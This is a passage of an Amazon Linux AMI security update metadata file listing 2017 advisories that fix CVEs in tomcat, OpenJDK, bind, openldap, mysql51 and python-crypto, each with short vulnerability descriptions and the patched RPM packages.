release="1.13.13.1.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.41-1.13.13.1.77.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.41-1.13.13.1.77.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.41-1.13.13.1.77.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.41-1.13.13.1.77.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.41-1.13.13.1.77.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.41-1.13.13.1.77.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.41-1.13.13.1.77.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.41-1.13.13.1.77.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.41-1.13.13.1.77.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.41-1.13.13.1.77.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.41-1.13.13.1.77.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-796</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-796: medium priority package update for tomcat7 tomcat8</title><issued date="2017-02-14 12:00:00" /><updated date="2017-02-14 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8745:
1403824:
CVE-2016-8745 tomcat: information disclosure due to incorrect Processor sharing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8745" title="" id="CVE-2016-8745" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-jsp-2.3-api" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.75-1.25.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-797</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-797: critical priority package update for java-1.7.0-openjdk</title><issued date="2017-02-14 12:00:00" /><updated date="2017-02-14 12:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3289:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 7u121 and 8u112; Java SE Embedded: 8u111. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS v3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts).
1413562:
CVE-2017-3289 OpenJDK: insecure class construction (Hotspot, 8167104)
CVE-2017-3272:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u131, 7u121 and 8u112; Java SE Embedded: 8u111. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS v3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts).
1413554:
CVE-2017-3272 OpenJDK: insufficient protected field access checks in atomic field updaters (Libraries, 8165344)
CVE-2017-3261:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 6u131, 7u121 and 8u112; Java SE Embedded: 8u111. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS v3.0 Base Score 4.3 (Confidentiality impacts).
1413653:
CVE-2017-3261 OpenJDK: integer overflow in SocketOutputStream boundary check (Networking, 8164147)
CVE-2017-3253:
It was discovered that the 2D component of OpenJDK performed parsing of iTXt and zTXt PNG image chunks even when configured to ignore metadata. An attacker able to make a Java application parse a specially crafted PNG image could cause the application to consume an excessive amount of memory.
1413583:
CVE-2017-3253 OpenJDK: imageio PNGImageReader failed to honor ignoreMetadata for iTXt and zTXt chunks (2D, 8166988)
CVE-2017-3252:
It was discovered that the JAAS component of OpenJDK did not use the correct way to extract user DN from the result of the user search LDAP query. A specially crafted user LDAP entry could cause the application to use an incorrect DN.
1413906:
CVE-2017-3252 OpenJDK: LdapLoginModule incorrect userDN extraction (JAAS, 8161743)
CVE-2017-3241:
It was discovered that the RMI registry and DCG implementations in the RMI component of OpenJDK performed deserialization of untrusted inputs. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of RMI registry or a Java RMI application.
1413955:
CVE-2017-3241 OpenJDK: untrusted input deserialization in RMI registry and DCG (RMI, 8156802)
CVE-2017-3231:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 6u131, 7u121 and 8u112; Java SE Embedded: 8u111. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS v3.0 Base Score 4.3 (Confidentiality impacts).
1413717:
CVE-2017-3231 OpenJDK: URLClassLoader insufficient access control checks (Networking, 8151934)
CVE-2016-5552:
It was discovered that the Networking component of OpenJDK failed to properly parse user info from the URL. A remote attacker could cause a Java application to incorrectly parse an attacker supplied URL and interpret it differently from other applications processing the same URL.
1413882:
CVE-2016-5552 OpenJDK: incorrect URL parsing in URLStreamHandler (Networking, 8167223)
CVE-2016-5548:
A covert timing channel flaw was found in the DSA implementation in the Libraries component of OpenJDK. A remote attacker could possibly use this flaw to extract certain information about the used key via a timing side channel.
1413920:
CVE-2016-5548 OpenJDK: DSA implementation timing attack (Libraries, 8168728)
CVE-2016-5547:
It was discovered that the Libraries component of OpenJDK did not validate the length of the object identifier read from the DER input before allocating memory to store the OID. An attacker able to make a Java application decode a specially crafted DER input could cause the application to consume an excessive amount of memory.
1413764:
CVE-2016-5547 OpenJDK: missing ObjectIdentifier length check (Libraries, 8168705)
CVE-2016-5546:
It was discovered that the Libraries component of OpenJDK accepted ECSDA signatures using non-canonical DER encoding. This could cause a Java application to accept signature in an incorrect format not accepted by other cryptographic tools.
It was discovered that the Libraries component of OpenJDK accepted ECDSA signatures using non-canonical DER encoding. This could cause a Java application to accept signature in an incorrect format not accepted by other cryptographic tools.
1413911:
CVE-2016-5546 OpenJDK: incorrect ECDSA signature extraction from the DER input (Libraries, 8168714)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5546" title="" id="CVE-2016-5546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5547" title="" id="CVE-2016-5547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5548" title="" id="CVE-2016-5548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5552" title="" id="CVE-2016-5552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3231" title="" id="CVE-2017-3231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3241" title="" id="CVE-2017-3241" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3252" title="" id="CVE-2017-3252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3253" title="" id="CVE-2017-3253" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3261" title="" id="CVE-2017-3261" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3272" title="" id="CVE-2017-3272" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3289" title="" id="CVE-2017-3289" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-demo" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.131-2.6.9.0.70.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.131-2.6.9.0.70.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.131-2.6.9.0.70.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.131-2.6.9.0.70.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.131-2.6.9.0.70.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.131-2.6.9.0.70.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.131-2.6.9.0.70.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.131-2.6.9.0.70.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.131-2.6.9.0.70.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.131-2.6.9.0.70.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.131" release="2.6.9.0.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.131-2.6.9.0.70.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-798</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-798: important priority package update for bind</title><issued date="2017-02-14 12:00:00" /><updated date="2017-02-14 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9147:
A denial of service flaw was found in the way BIND handled a query response containing inconsistent DNSSEC information. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS response.
1411367:
CVE-2016-9147 bind: assertion failure while handling a query response containing inconsistent DNSSEC information
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9147" title="" id="CVE-2016-9147" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.47.rc1.52.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.47.rc1.52.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.47.rc1.52.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.47.rc1.52.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.47.rc1.52.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.47.rc1.52.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.47.rc1.52.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.47.rc1.52.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.47.rc1.52.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.47.rc1.52.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.47.rc1.52.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.47.rc1.52.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.47.rc1.52.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.47.rc1.52.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.47.rc1.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-799</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-799: medium priority package update for openldap</title><issued date="2017-02-14 12:00:00" /><updated date="2017-02-14 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3276:
A flaw was found in the way OpenLDAP parsed OpenSSL-style cipher strings. As a result, OpenLDAP could potentially use ciphers that were not intended to be enabled.
1238322:
CVE-2015-3276 openldap: incorrect multi-keyword mode cipherstring parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3276" title="" id="CVE-2015-3276" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openldap-servers" version="2.4.40" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-2.4.40-12.30.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.40" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.40-12.30.amzn1.x86_64.rpm</filename></package><package name="openldap-clients" version="2.4.40" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-clients-2.4.40-12.30.amzn1.x86_64.rpm</filename></package><package name="openldap" version="2.4.40" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-2.4.40-12.30.amzn1.x86_64.rpm</filename></package><package name="openldap-debuginfo" version="2.4.40" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-debuginfo-2.4.40-12.30.amzn1.x86_64.rpm</filename></package><package name="openldap-devel" version="2.4.40" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-devel-2.4.40-12.30.amzn1.x86_64.rpm</filename></package><package name="openldap-debuginfo" version="2.4.40" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-debuginfo-2.4.40-12.30.amzn1.i686.rpm</filename></package><package name="openldap-clients" version="2.4.40" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-clients-2.4.40-12.30.amzn1.i686.rpm</filename></package><package name="openldap-servers-sql" version="2.4.40" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.40-12.30.amzn1.i686.rpm</filename></package><package name="openldap" version="2.4.40" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-2.4.40-12.30.amzn1.i686.rpm</filename></package><package name="openldap-servers" version="2.4.40" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-2.4.40-12.30.amzn1.i686.rpm</filename></package><package name="openldap-devel" version="2.4.40" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-devel-2.4.40-12.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-800</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-800: important priority package update for mysql51</title><issued date="2017-02-22 18:00:00" /><updated date="2017-02-22 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6663:
A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user.
1378936:
CVE-2016-6663 CVE-2016-5616 mysql: race condition while setting stats during MyISAM table repair (CPU Oct 2016)
CVE-2016-6662:
It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server.
1375198:
CVE-2016-6662 mysql: general_log can write to configuration files, leading to privilege escalation (CPU Oct 2016)
1375198:
CVE-2016-6662 mysql: general_log can write to configuration files, leading to privilege escalation
CVE-2016-5616:
A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user.
1378936:
CVE-2016-6663 CVE-2016-5616 mysql: race condition while setting stats during MyISAM table repair (CPU Oct 2016)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5616" title="" id="CVE-2016-5616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6662" title="" id="CVE-2016-6662" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6663" title="" id="CVE-2016-6663" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql51-server" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-test" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.73" release="8.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.73-8.72.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-debuginfo-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-common" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-server" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.73-8.72.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.73" release="8.72.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-5.1.73-8.72.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-801</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-801: important priority package update for python-crypto</title><issued date="2017-03-06 14:00:00" /><updated date="2017-03-06 14:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-7459:
Heap-based buffer overflow in the ALGnew function in block_templace.c in Python Cryptography Toolkit (aka pycrypto) allows remote attackers to execute arbitrary code as demonstrated by a crafted iv parameter to cryptmsg.py.
1409754:
CVE-2013-7459 pycrypto: Heap-buffer overflow in ALGobject structure
